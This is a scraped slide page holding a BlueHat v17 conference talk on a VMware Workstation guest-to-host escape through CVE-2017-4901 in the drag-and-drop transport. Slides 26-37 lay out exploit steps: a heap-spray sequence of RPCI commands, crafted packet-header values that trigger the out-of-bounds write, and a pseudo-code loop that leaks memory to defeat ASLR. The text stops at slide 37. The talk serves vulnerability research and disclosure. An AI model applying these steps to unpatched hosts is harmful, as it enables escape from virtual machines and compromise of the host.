Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015
 
Book
BookBook
Book
 
Import golang; struct microservice
Import golang; struct microserviceImport golang; struct microservice
Import golang; struct microservice
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platforms
 
LFCOLLAB15: Xen 4.5 and Beyond
LFCOLLAB15: Xen 4.5 and BeyondLFCOLLAB15: Xen 4.5 and Beyond
LFCOLLAB15: Xen 4.5 and Beyond
 
Rooting Out Root: User namespaces in Docker
Rooting Out Root: User namespaces in DockerRooting Out Root: User namespaces in Docker
Rooting Out Root: User namespaces in Docker
 
Security in serverless world
Security in serverless worldSecurity in serverless world
Security in serverless world
 

Más de BlueHat Security Conference

BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...
BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...
BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...BlueHat Security Conference
 
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One StoryBlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One StoryBlueHat Security Conference
 
BlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
BlueHat Seattle 2019 || Kubernetes Practical Attack and DefenseBlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
BlueHat Seattle 2019 || Kubernetes Practical Attack and DefenseBlueHat Security Conference
 
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come aloneBlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come aloneBlueHat Security Conference
 
BlueHat Seattle 2019 || Modern Binary Analysis with ILs
BlueHat Seattle 2019 || Modern Binary Analysis with ILsBlueHat Seattle 2019 || Modern Binary Analysis with ILs
BlueHat Seattle 2019 || Modern Binary Analysis with ILsBlueHat Security Conference
 
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.BlueHat Security Conference
 
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure ADBlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure ADBlueHat Security Conference
 
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || Autopsies of Recent DFIR InvestigationsBlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || Autopsies of Recent DFIR InvestigationsBlueHat Security Conference
 
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...BlueHat Security Conference
 
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...BlueHat Security Conference
 
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...BlueHat Security Conference
 
BlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || First strontium uefi rootkit unveiledBlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || First strontium uefi rootkit unveiledBlueHat Security Conference
 
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || WSL reloaded - Let's try to do better fuzzingBlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || WSL reloaded - Let's try to do better fuzzingBlueHat Security Conference
 
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxyBlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxyBlueHat Security Conference
 
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windowsBlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windowsBlueHat Security Conference
 
BlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Memory resident implants - code injection is alive and wellBlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Memory resident implants - code injection is alive and wellBlueHat Security Conference
 
BlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Massive scale usb device driver fuzz without deviceBlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Massive scale usb device driver fuzz without deviceBlueHat Security Conference
 
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...BlueHat Security Conference
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 

Más de BlueHat Security Conference (20)

BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...
BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...
BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...
 
BlueHat Seattle 2019 || Keynote
BlueHat Seattle 2019 || KeynoteBlueHat Seattle 2019 || Keynote
BlueHat Seattle 2019 || Keynote
 
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One StoryBlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
 
BlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
BlueHat Seattle 2019 || Kubernetes Practical Attack and DefenseBlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
BlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
 
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come aloneBlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
 
BlueHat Seattle 2019 || Modern Binary Analysis with ILs
BlueHat Seattle 2019 || Modern Binary Analysis with ILsBlueHat Seattle 2019 || Modern Binary Analysis with ILs
BlueHat Seattle 2019 || Modern Binary Analysis with ILs
 
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
 
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure ADBlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
 
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || Autopsies of Recent DFIR InvestigationsBlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
 
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
 
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
 
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
 
BlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || First strontium uefi rootkit unveiledBlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || First strontium uefi rootkit unveiled
 
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || WSL reloaded - Let's try to do better fuzzingBlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
 
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxyBlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
 
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windowsBlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
 
BlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Memory resident implants - code injection is alive and wellBlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Memory resident implants - code injection is alive and well
 
BlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Massive scale usb device driver fuzz without deviceBlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Massive scale usb device driver fuzz without device
 
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 

Último

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

Último (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 

BlueHat v17 || Out of the Truman Show: VM Escape in VMware Gracefully

  • 1. Out of The Truman Show: VM escape in VMware gracefully Lei Shi && Mei Wang
  • 2.  Lei Shi is a security researcher of 360-CERT, mainly focus on cryptography security and vulnerability discovery. He has discovered 100+ bugs and gained 20+ CVEs(E.g: OpenSSL Death Alert) from OpenSSL, OpenSSH, VMware. He obsesses with math and computer security, and currently is working on Windows Search protocol security, Linux kernel security and development of vulnerability discovery tools.  Mei Wang is a security researcher of the Gear Team of Qihoo 360 Inc., mainly focus on vulnerability discovery and fuzz technology. In the last year, she already gained 10+ CVEs from Firefox, Safari, Solr, Libtiff. She has made a talk in CanSecWest 2017, Syscan360. She is currently working on browser security and fuzz tools development using math and machine learning. About Us
  • 3. a. Attack surface of VMware Workstation b. VMware RPCI and backdoor c. VMware Fuzz Framework d. CVE-2017-4901 e. Exploit f. Demo g. Conclusion Agenda
  • 4.  History vulnerabilities  Attack surface ① Attack surface of VMware Workstation Attack surface of VMware Workstation
  • 5. http://cve.mitre.org 17 / 10/24 ① Attack surface of VMware Workstation
  • 6. ① Attack surface of VMware Workstation  VMCI (CVE-2017-4901) VMCI (VMware Virtual Machine Communication Interface), a high-speed interface that virtual machines on the same host use to communicate with each other and the host kernel modules. It’s an optional function, if enabled, Guest could execute command use vmware-vmx.exe process in the Host machine. When VMware Tools were installed in the Guest, VMCI was enabled to communication.  IOCTL(CVE-2014-2384) A device input and output control interface to allow application in the user space to communicate with Vmkernel in the kernel space.  COM port (CVE-2017-4908 ~ 4913) Features like printer are implemented basic on com port 。 There are many vulnerabilities discovered in COM port, especially True Type Font parser and JPEG2000 parser in the TPView.dll.  Device Drivers (sound card, network card, graphics card, USB…) (CVE-2017-4900)
  • 7.  RPCI  Backdoor ② RPCI and Backdoor RPCI and Backdoor
  • 8. ② RPCI and Backdoor  Backdoor: a communication mechanism between VMware Host and Guest. Send message through the VMware special I/O port Support multiple commands.  RPCI: Remote Procedure Call Interface Based on Backdoor Guest can send request to Host: Drag and Drop, copy paste… Format: <command><parameters> vmware-vmx.exe handles every RPCI commands.
  • 9. ② RPCI and Backdoor
  • 10. ② RPCI and Backdoor
  • 11. ② RPCI and Backdoor
  • 12. ② RPCI and Backdoor
  • 13. ② RPCI and Backdoor info-set/info-get vmx.capability.unified_loop tools.capability.guest_temp_directory guest.upgrader_send_cmd_line_args/ toolsAutoInstallGetParams tools.capability.dnd_version tools.capability.copypase_version vmx.capability.dnd_version vmx.capability.copypase_version unity.window.contents.start unity.window.contents.chunk copypaste.transport
  • 14. ② RPCI and Backdoor
  • 17. ③ Fuzz Framework  Guest Run a backdoor command fuzz  Host a) Pageheap must be opened b) Injecting a memory monitor to recode memory use and capture out-of-bounds read/write and heap use- before-init vulnerabilities. Memory monitor delayed free object to capture double-free and UAF vulnerabilities. c) Out-of-bounds of stack variabilities is difficult to capture, so we used pin to handle command processing functions specially d) A stack scanner introduced to capture stack use-before-init vulnerabilities. e) Vsock was used to feedback paths of some interested functions to help Guest fuzz constraint variable range better.
  • 18. ③ Fuzz Framework  UAF “tools.capability.dnd_version” When dnd_version is set 2, an arbitrary 0x100 bytes data can be filled in memory, then call command copypaste.transport and control RIP and R8.  Continuous Out-of-bounds Write “copypaste.transport” Further detail will be discussed later.
  • 20. ④ CVE-2017-4901 The Drag-and-Drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a Guest to execute code on the operation system that runs Workstation or Fusion.  VMware Workstation Pro before 12.5.4  Exists in DnD version 3  We can control the overflow size.  Multi out-of-bounds write  Combing with some commands, out-of-bounds Read  Information leak and arbitrary code execute if we put the out-of-bounds Write/Read before an appropriate object.
  • 22. ④ CVE-2017-4901  packetSize == packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE  packetSize <= DND_MAX_TRANSPORT_PACKET_SIZE  Packet->payloadSize + packet->offset <= packet->totalSize  Packet->totalSize <= DNDMSG_MAX_ARGSZ  The totalSize of first packet specifies the size of buffer allocated on the heap.  For the first packet, the member packet->offset must be 0.  All the packets in the same message must have same seqNum.
  • 26. ⑤ Exploit  If we want to gain code execute, we need to coverage a function pointer on the heap or overwrite a vtable of a C++ object  Ideally, if we put the OOB-Write/Read before an appropriate object, we can achieve both information disclosure (defeat ASLR ) and arbitrary code execution. vul trans block info-set/get buffer DnD/CP object overflow overflow
  • 27. ⑤ Exploit LFH ( Windows Low Fragmented Heap) LFH is used for allocations with size 1 to 16368(0x3FF0) bytes, prevents fragmentation by using a bucketing scheme which causes similarly-sized blocks to be allocated from larger pre-allocated blocks of memory. The LFH buckets are only activated if their corresponding allocation size are detected to be popular. It would be better to choose a least used suitable block.
  • 28. ⑤ Exploit LFH If we want to allocate three contiguous memory blocks (vul trans block , info-set/get block , DnD/CP object) , we can follow the steps below. Notes, the LFH size of X0, X1, Y0, Y1, Y2 is not activated before.
  • 29. ⑤ Exploit LFH An suitable and precise heap spray can form three contiguous memory buckets. Ideally, we can gain three buckets as follows. bucket bucket n bucket (n+1) bucket (n+2) Memory Growth Direction
  • 30. ⑤ Exploit A full bucket Free obj X alloc obj Y LFH Free and reuse a full buckets. Under normal circumstances, because of LFH, free a memory and allocate the same size memory again, we may not occupy the memory freed previous, but it is an exception for a full buckets.
  • 31. ⑤ Exploit HeapSpray: vmx.capability.unified_loop Bucket1 : tools.capability.guest_temp_directory 1 G000G======= Bucket2 : (beaconStr) guest.upgrader_send_cmd_line_args G000G*************** Bucket3: (set dndVersion 3) tools.capability.dnd_version 3 tools.capability.copypaste_version 3 vmx.capability.dnd_version vmx.capability.copypaste_version Size: 0xB0(0x10(head)+0xA0) [b][c]GGGGGGGGGG…………GGGG ………………………… [1][3]GGGGGGGGGG…………GGGG G000G===========.……..====GG0 [a][a]GGGGGGGGGG…………GGGG ………………………… [a][a]GGGGGGGGGG…………GGGG G000G*****************.……..*********0 [3][5]GGGGGGGGGG…………GGGG ………………………… [6][7]GGGGGGGGGG…………GGGG DnD/CP object [8][9]GGGGGGGGGG…………GGGG ………………………… [d][e]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG Bucket1 Bucket2 Bucket3
  • 32. ⑤ Exploit Send command “tools.capability.guest_temp_directory 1 azbo” [b][c]GGGGGGGGGG…………GGGG ………………………… [1][3]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG ………………………… [a][a]GGGGGGGGGG…………GGGG G000G*****************.……..*********0 [3][5]GGGGGGGGGG…………GGGG ………………………… [6][7]GGGGGGGGGG…………GGGG DnD/CP object [8][9]GGGGGGGGGG…………GGGG ………………………… [d][e]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG G000G===========.……..====GG0FreeBucket1 Bucket2 Bucket3
  • 33. ⑤ Exploit DnDTransportPacketHeader h1; h1.totalSize=0xA0; h1.offset=0; h1.payloadSize=0x90 Command: copypaste.transport &h1 000000000000000 [b][c]GGGGGGGGGG…………GGGG ………………………… [1][3]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG ………………………… [a][a]GGGGGGGGGG…………GGGG G000G******************. ……..*********0 [3][5]GGGGGGGGGG…………GGGG ………………………… [6][7]GGGGGGGGGG…………GGGG DnD/CP object [8][9]GGGGGGGGGG…………GGGG ………………………… [d][e]GGGGGGGGGG…………GGGG [a][a]GGGGGGGGGG…………GGGG FreeG000G000000000000……….…GGGG Bucket1 Bucket2 Bucket3
  • 34. ⑤ Exploit DnDTransportPacketHeader h1; h1.type=3; h1.seqNum = seq; h1.totalSize=0xA0; h1.offset=0; h1.payloadSize=0x90 Command: copypaste.transport &h1 000000000000000 0xB0 (Free) Head(0x10) h1.payloadSize=0x90 totalSize(0xA0) h1.offset(0x90) 0xB0 0xB0 Head(0x10) Head(0x10)
  • 35. ⑤ Exploit DnDTransportPacketHeader h2; h2.type = h1.type = 3; h2.seqNum = h1.seqNum = seq; h2.tatalSize=0xA000; h2.offset=h1.payloadSize=0x90; h2.payloadSize = 0x20 Command: copypaste.transport &h2 000000000000000 0xB0 Head(0x10) h1.payloadSize=0x90 totalSize(0xA0) h1.offset(0x90) 0xB0 0xB0 overwriteHead(0x10) Head(0x10) h2.payloadSize=0x20 h2.offset(0xB0)
  • 36. ⑤ Exploit h2.offset = 0x90+0x20=0xB0; h2.payloadSize = 0xA0+0x10 = 0xB0; Command: copypaste.transport &h2 000000000000000 0xB0 Head(0x10) h1.payloadSize=0x90 totalSize(0xA0) h1.offset(0x90) 0xB0 0xB0 overwriteHead(0x10) Head(0x10) h2.payloadSize=0x20 h2.payloadSize=0xB0 h2.offset(0xB0) h2.offset(0x160)
  • 37. ⑤ Exploit pos = 0; While (TRUE): overwrite 0xB0 if(pos==0) { command: ToolsAutoInstallGetParams Message_Receive(chan, &buf, &rsize) if(buf[2]==‘0’) //beaconStr(bucket 2) { pos = 0xB0 if(rsize > pos+4) if( buf[pos+2] == 0x40 && buf[pos+3] == 0x9A ) calculate base address } } else { pos += 0xB0; command: ToolsAutoInstallGetParams Message_Receive(chan, &buf, &rsize) if(rsize > pos+4) if( buf[pos+2] == 0x40 && buf[pos+3] == 0x9A ) calculate base address } G000G*******……………….***** ************************************ ************************************ ************************************ ************************************ ************************************ 0 0xB0 [flag1] [flag2]GGGGGGGGGGGGGGG GG…….GGGGGGGGGGGGG GGGGGGGGGGGGGGGGGG GGGGGGGGGGGGGGGGGG GGGGGGGGGGGGGGGGGG GGGGGGGGGGGGG0 [40][9A][xx][xx][xx][xx][00] [00]??????????????????????? ?????????????????????????? ??????.....????????????????? ?????????????????????????? ?????????????????????????? ????? Head(0x10) 0xB0 0xB0 Head(0x10) Head(0x10) 00000000000000000000000000 00000……………….000000000 